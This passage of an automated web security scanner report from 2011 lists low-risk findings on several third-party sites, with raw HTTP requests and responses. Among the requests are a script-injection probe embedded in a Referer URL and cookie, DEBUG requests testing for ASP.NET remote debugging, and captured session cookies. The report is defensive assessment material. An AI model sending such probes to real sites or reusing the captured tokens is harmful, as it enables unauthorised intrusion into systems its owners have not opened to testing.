Content-Type: text/html;Charset=ISO-8859-1
Content-Length: 30805

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

   <head
...[SNIP]...
<div class="memlogin">
<form id="login" method="post" action="https://www.nanpa.org/members.php">
<table cellpadding="3" cellspacing="0" border="0" class="login_form">
...[SNIP]...
<td><input name="text2" type="password" size="10" class="login_box"/></td>
...[SNIP]...

14.23. http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreFront.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.resourcenter.net
Path:   /Scripts/4Disapi3.dll/4DCGI/store/StoreFront.html

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /Scripts/4Disapi3.dll/4DCGI/store/StoreFront.html?Action=Store HTTP/1.1
Host: www.resourcenter.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nanpa.org/forumsa3871%3Cscript%3Ealert(%22GHDB%22)%3C/script%3Ed19da0837d8/external.php?type=js

Response

HTTP/1.0 200 OK
Server: 4D_WebStar_D/2004
Date: Thu, 12 May 2011 00:13:38 GMT
Set-Cookie: SessionID=12387722t57wa9af1j74hos45z8o98ffd44jq45yyc2g314874sb627q4yk50a2g;Path=/
Connection: close
Last-Modified: Thu, 12 May 2011 00:13:38 GMT
Content-Type: text/html;Charset=ISO-8859-1
Content-Length: 18909

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
...[SNIP]...
<div class="memlogin">
<form id="login" method="post" action="https://www.nanpa.org/members.php">
<table cellpadding="3" cellspacing="0" border="0" class="login_form">
...[SNIP]...
<td><input name="text2" type="password" size="10" class="login_box"/></td>
...[SNIP]...

14.24. http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreFront.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.resourcenter.net
Path:   /Scripts/4Disapi3.dll/4DCGI/store/StoreFront.html

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /Scripts/4Disapi3.dll/4DCGI/store/StoreFront.html?Action=Store HTTP/1.1
Host: www.resourcenter.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nanpa.org/forumsa3871%3Cscript%3Ealert(%22GHDB%22)%3C/script%3Ed19da0837d8/external.php?type=js

Response

HTTP/1.0 200 OK
Server: 4D_WebStar_D/2004
Date: Thu, 12 May 2011 00:13:38 GMT
Set-Cookie: SessionID=12387722t57wa9af1j74hos45z8o98ffd44jq45yyc2g314874sb627q4yk50a2g;Path=/
Connection: close
Last-Modified: Thu, 12 May 2011 00:13:38 GMT
Content-Type: text/html;Charset=ISO-8859-1
Content-Length: 18909

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
...[SNIP]...
<div class="memlogin">
<form id="login" method="post" action="https://www.nanpa.org/members.php">
<table cellpadding="3" cellspacing="0" border="0" class="login_form">
...[SNIP]...
<td><input name="text2" type="password" size="10" class="login_box"/></td>
...[SNIP]...

14.25. http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreItems.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.resourcenter.net
Path:   /Scripts/4Disapi3.dll/4DCGI/store/StoreItems.html

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

POST /Scripts/4Disapi3.dll/4DCGI/store/StoreItems.html?Action=Find_Store_Items&Time=-1775958525&SessionID=123877210b1f1xo775o9i223siv0f2z7whc8raukm2fh5prl571g1cp127jk943s HTTP/1.1
Host: www.resourcenter.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreFront.html?Action=Store
Cookie: SessionID=123877210b1f1xo775o9i223siv0f2z7whc8raukm2fh5prl571g1cp127jk943s; __utma=11887927.350769674.1305159223.1305159223.1305159223.1; __utmb=11887927.1.10.1305159223; __utmc=11887927; __utmz=11887927.1305159223.1.1.utmcsr=nanpa.org|utmccn=(referral)|utmcmd=referral|utmcct=/forumsa3871%3Cscript%3Ealert(%22GHDB%22)%3C/script%3Ed19da0837d8/external.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 78

Template=NANPA+Gear&MarketName_W=&bFindInventory=Find+Item%28s%29&NumToShow=10

Response

HTTP/1.0 200 OK
Server: 4D_WebStar_D/2004
Date: Thu, 12 May 2011 00:14:02 GMT
Connection: close
Last-Modified: Thu, 12 May 2011 00:14:02 GMT
Content-Type: text/html;Charset=ISO-8859-1
Content-Length: 27135

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
...[SNIP]...
<div class="memlogin">
<form id="login" method="post" action="https://www.nanpa.org/members.php">
<table cellpadding="3" cellspacing="0" border="0" class="login_form">
...[SNIP]...
<td><input name="text2" type="password" size="10" class="login_box"/></td>
...[SNIP]...

14.26. http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreItems.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.resourcenter.net
Path:   /Scripts/4Disapi3.dll/4DCGI/store/StoreItems.html

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

POST /Scripts/4Disapi3.dll/4DCGI/store/StoreItems.html?Action=Find_Store_Items&Time=-1775958525&SessionID=123877210b1f1xo775o9i223siv0f2z7whc8raukm2fh5prl571g1cp127jk943s HTTP/1.1
Host: www.resourcenter.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreFront.html?Action=Store
Cookie: SessionID=123877210b1f1xo775o9i223siv0f2z7whc8raukm2fh5prl571g1cp127jk943s; __utma=11887927.350769674.1305159223.1305159223.1305159223.1; __utmb=11887927.1.10.1305159223; __utmc=11887927; __utmz=11887927.1305159223.1.1.utmcsr=nanpa.org|utmccn=(referral)|utmcmd=referral|utmcct=/forumsa3871%3Cscript%3Ealert(%22GHDB%22)%3C/script%3Ed19da0837d8/external.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 78

Template=NANPA+Gear&MarketName_W=&bFindInventory=Find+Item%28s%29&NumToShow=10

Response

HTTP/1.0 200 OK
Server: 4D_WebStar_D/2004
Date: Thu, 12 May 2011 00:14:02 GMT
Connection: close
Last-Modified: Thu, 12 May 2011 00:14:02 GMT
Content-Type: text/html;Charset=ISO-8859-1
Content-Length: 27135

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
...[SNIP]...
<div class="memlogin">
<form id="login" method="post" action="https://www.nanpa.org/members.php">
<table cellpadding="3" cellspacing="0" border="0" class="login_form">
...[SNIP]...
<td><input name="text2" type="password" size="10" class="login_box"/></td>
...[SNIP]...

14.27. http://www.secviz.org/node/89

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.secviz.org
Path:   /node/89

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /node/89 HTTP/1.1
Host: www.secviz.org
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:48:56 GMT
Server: Apache/2.2.17
Set-Cookie: SESS511f69598f6d24673b9cd181bd44c360=3679a5a8e5f156807fb4105e9bf204df; expires=Sat, 04-Jun-2011 04:22:16 GMT; path=/; domain=.secviz.org
Last-Modified: Wed, 11 May 2011 22:47:09 GMT
ETag: "13ef58d2264914230329c15df5277159"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Content-Type: text/html; charset=utf-8
Content-Length: 17680

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<title>The D
...[SNIP]...
<div class="content">
<form action="/content/the-davix-live-cd?destination=node%2F89" method="post" id="user-login-form">
<div>
...[SNIP]...
</label>
<input type="password" name="pass" id="edit-pass" maxlength="60" size="15" class="form-text required" />
</div>
...[SNIP]...

15. ASP.NET debugging enabled
There are 4 instances of this issue:

Issue background

ASP.NET allows remote debugging of web applications, if configured to do so. By default, debugging is subject to access control and requires platform-level authentication.

If an attacker can successfully start a remote debugging session, this is likely to disclose sensitive information about the web application and supporting infrastructure which may be valuable in formulating targeted attacks against the system.

Issue remediation

To disable debugging, open the Web.config file for the application, and find the <compilation> element within the <system.web> section. Set the debug attribute to "false". Note that it is also possible to enable debugging for all applications within the Machine.config file. You should also confirm that the debug attribute in the <compilation> element has not been set to "true" within the Machine.config file.

It is strongly recommended that you refer to your platform's documentation relating to this issue, and do not rely solely on the above remediation.



15.1. http://gvnwlnp.com/Default.aspx

Summary

Severity:   Information
Confidence:   Firm
Host:   http://gvnwlnp.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: gvnwlnp.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Thu, 12 May 2011 00:44:31 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Basic realm="gvnwlnp.com"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

15.2. https://gvnwlnp.com/Default.aspx

Summary

Severity:   Information
Confidence:   Firm
Host:   https://gvnwlnp.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: gvnwlnp.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Thu, 12 May 2011 00:50:11 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Basic realm="gvnwlnp.com"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

15.3. http://www.etalkup.com/Default.aspx

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.etalkup.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.etalkup.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Thu, 12 May 2011 01:06:36 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

15.4. http://www.redskye911.com/Default.aspx

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.redskye911.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.redskye911.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Thu, 12 May 2011 01:06:40 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Basic realm="www.redskye911.com"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

16. Referer-dependent response
There are 3 instances of this issue:

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses are updated based on Referer data, then the same defences against malicious input should be employed here as for any other kinds of user-supplied data.



16.1. http://twitter.com/statuses/user_timeline/secviz.json

Summary

Severity:   Information
Confidence:   Firm
Host:   http://twitter.com
Path:   /statuses/user_timeline/secviz.json

Request 1

GET /statuses/user_timeline/secviz.json?callback=twitterCallback2&count=5 HTTP/1.1
Host: twitter.com
Proxy-Connection: keep-alive
Referer: http://www.secviz.org/node/89
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=130340348934320043; __utmz=43838368.1303561994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); js=1; __utma=43838368.551233229.1303561994.1304617828.1304721594.4

Response 1

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:49:03 GMT
Server: hi
Status: 200 OK
X-Transaction: 1305161343-28574-3094
X-RateLimit-Limit: 150
ETag: "9c18d6e3de016bac59085e3c74723530"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Thu, 12 May 2011 00:49:03 GMT
X-RateLimit-Remaining: 148
X-Runtime: 0.04405
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef11477ab40b6
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 48c6b00eb172eca08292fefc3f9a44aa803a0bea
X-RateLimit-Reset: 1305164927
Set-Cookie: k=173.193.214.243.1305161343071359; path=/; expires=Thu, 19-May-11 00:49:03 GMT; domain=.twitter.com
Set-Cookie: original_referer=ZLhHHTiegr8kpyX5k%2BwrH7KWx%2F5%2BVN6GIeAi2OckkTU%3D; path=/
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCMagreEvAToHaWQiJTFlNzc0MGNjZDE5YWRh%250ANmViZDk3ZWZmMTgxMzUwYjRiIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--9e2ecb2bd74b01132ec8ea6647ea1b3428d0ca0f; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
X-XSS-Protection: 1; mode=block
Connection: close
Content-Length: 6953

twitterCallback2([{"text":"RT @pcapr Visualizing application flows: http:\/\/bit.ly\/kSappw","coordinates":null,"truncated":false,"id_str":"64004740723392512","source":"\u003Ca href=\"http:\/\/seesmic.com\/seesmic_desktop\/sd2\" rel=\"nofollow\"\u003ESeesmic Desktop\u003C\/a\u003E","geo":null,"favorited":false,"retweet_count":0,"in_reply_to_screen_name":null,"in_reply_to_status_id":null,"in_reply_to_status_id_str":null,"place":null,"created_at":"Fri Apr 29 16:34:53 +0000 2011","contributors":null,"user":{"profile_use_background_image":true,"statuses_count":229,"following":null,"profile_background_color":"9AE4E8","description":"This is a place to share, discuss, challenge, and learn about security visualization.","screen_name":"secviz","default_profile_image":false,"profile_background_image_url":"http:\/\/a1.twimg.com\/profile_background_images\/3257193\/logo.png","verified":false,"friends_count":241,"id_str":"16990708","profile_text_color":"333333","location":"","follow_request_sent":null,"profile_sidebar_fill_color":"DDFFCC","is_translator":false,"default_profile":false,"profile_background_tile":false,"url":"http:\/\/secviz.org","lang":"en","followers_count":595,"protected":false,"notifications":null,"time_zone":"Pacific Time (US & Canada)","created_at":"Mon Oct 27 02:08:14 +0000 2008","profile_link_color":"0084B4","name":"SecViz","show_all_inline_media":false,"listed_count":82,"contributors_
...[SNIP]...

Request 2

GET /statuses/user_timeline/secviz.json?callback=twitterCallback2&count=5 HTTP/1.1
Host: twitter.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=130340348934320043; __utmz=43838368.1303561994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); js=1; __utma=43838368.551233229.1303561994.1304617828.1304721594.4

Response 2

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:49:10 GMT
Server: hi
Status: 200 OK
X-Transaction: 1305161350-10080-54358
X-RateLimit-Limit: 150
ETag: "9c18d6e3de016bac59085e3c74723530"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Thu, 12 May 2011 00:49:10 GMT
X-RateLimit-Remaining: 129
X-Runtime: 0.01342
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef11477ab40b6
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: db4f6e0fed08d24a6d74c64bfbf06a2810e5acc0
X-RateLimit-Reset: 1305164927
Set-Cookie: k=173.193.214.243.1305161350025304; path=/; expires=Thu, 19-May-11 00:49:10 GMT; domain=.twitter.com
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCI67reEvAToHaWQiJWI0MGUyNjQwZTEwOTFh%250ANzExYmZlYWZjNzIwOTBiNDU2IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--d3651f4a554063478772f4d2e0326f845fcfac72; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
X-XSS-Protection: 1; mode=block
Connection: close
Content-Length: 6953

twitterCallback2([{"text":"RT @pcapr Visualizing application flows: http:\/\/bit.ly\/kSappw","coordinates":null,"truncated":false,"id_str":"64004740723392512","source":"\u003Ca href=\"http:\/\/seesmic.com\/seesmic_desktop\/sd2\" rel=\"nofollow\"\u003ESeesmic Desktop\u003C\/a\u003E","geo":null,"favorited":false,"retweet_count":0,"in_reply_to_screen_name":null,"in_reply_to_status_id":null,"in_reply_to_status_id_str":null,"place":null,"created_at":"Fri Apr 29 16:34:53 +0000 2011","contributors":null,"user":{"profile_use_background_image":true,"statuses_count":229,"following":null,"profile_background_color":"9AE4E8","description":"This is a place to share, discuss, challenge, and learn about security visualization.","screen_name":"secviz","default_profile_image":false,"profile_background_image_url":"http:\/\/a1.twimg.com\/profile_background_images\/3257193\/logo.png","verified":false,"friends_count":241,"id_str":"16990708","profile_text_color":"333333","location":"","follow_request_sent":null,"profile_sidebar_fill_color":"DDFFCC","is_translator":false,"default_profile":false,"profile_background_tile":false,"url":"http:\/\/secviz.org","lang":"en","followers_count":595,"protected":false,"notifications":null,"time_zone":"Pacific Time (US & Canada)","created_at":"Mon Oct 27 02:08:14 +0000 2008","profile_link_color":"0084B4","name":"SecViz","show_all_inline_media":false,"listed_count":82,"contributors_enabled":false,"geo_enabled":false,"profile_sidebar_border_color":"BDDCAD","id":16990708,"u
...[SNIP]...

16.2. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /plugins/like.php

Request 1

GET /plugins/like.php?href=http%3A%2F%2Fwww.job-search-engine.com%2F&layout=standard&show_faces=false&width=315&action=like&font=verdana&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.job-search-engine.com/keyword/number-portability/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.18.37
X-Cnection: close
Date: Thu, 12 May 2011 00:46:02 GMT
Content-Length: 7533

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="connect_widget_4dcb2dca5addf7404454917" class="connect_widget" style="font-family: &quot;verdana&quot;, sans-serif"><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_facebook_favicon"></span><span class="connect_widget_user_action connect_widget_text hidden_elem">You like <b>Juju | Job Search Engine</b>.<span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_error_text">Error</a></span></span><span class="connect_widget_summary connect_widget_text"><span class="connect_widget_connected_text hidden_elem">You and 689 others like this.</span><span class="connect_widget_not_connected_text">689 likes. 
<a href="/campaign/landing.php?campaign_id=137675572948107&amp;partner_id=job-search-engine.com&amp;placement=like_button&amp;extra_1=http%3A%2F%2Fwww.job-search-engine.com%2Fkeyword%2Fnumber-portability%2F&amp;extra_2=US" target="_blank">Sign Up</a> to see what your friends like.</span><span class="unlike_span hidden_elem"><a class="connect_
...[SNIP]...

Request 2

GET /plugins/like.php?href=http%3A%2F%2Fwww.job-search-engine.com%2F&layout=standard&show_faces=false&width=315&action=like&font=verdana&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.130.55
X-Cnection: close
Date: Thu, 12 May 2011 00:46:14 GMT
Content-Length: 7363

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="connect_widget_4dcb2dd65f0b65615158696" class="connect_widget" style="font-family: &quot;verdana&quot;, sans-serif"><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_facebook_favicon"></span><span class="connect_widget_user_action connect_widget_text hidden_elem">You like <b>Juju | Job Search Engine</b>.<span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_error_text">Error</a></span></span><span class="connect_widget_summary connect_widget_text"><span class="connect_widget_connected_text hidden_elem">You and 689 others like this.</span><span class="connect_widget_not_connected_text">689 likes. 
<a href="/campaign/landing.php?campaign_id=137675572948107&amp;partner_id&amp;placement=like_button&amp;extra_2=US" target="_blank">Sign Up</a> to see what your friends like.</span><span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a c
...[SNIP]...

16.3. http://www.stumbleupon.com/hostedbadge.php

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.stumbleupon.com
Path:   /hostedbadge.php

Request 1

GET /hostedbadge.php?s=1 HTTP/1.1
Host: www.stumbleupon.com
Proxy-Connection: keep-alive
Referer: http://connectedplanetonline.com/bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
